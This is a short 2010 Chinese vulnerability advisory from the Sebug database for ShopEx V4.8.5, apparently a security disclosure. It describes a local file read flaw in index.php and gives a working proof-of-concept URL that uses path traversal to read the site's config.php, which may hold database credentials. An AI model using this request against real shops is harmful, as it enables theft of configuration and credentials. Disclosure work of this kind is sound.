SSV ID:19737
SEBUG-Appdir:ShopEx
发布时间:2010-06-03
影响版本:
Shopex V4.8.5
漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。
index.php在对参数的处理过程中存在本地文件读取漏洞
测试方法:
[www.sebug.net]
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
SEBUG安全建议:
厂商补丁:
ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn
// sebug.net [2010-06-04]
没有评论:
发表评论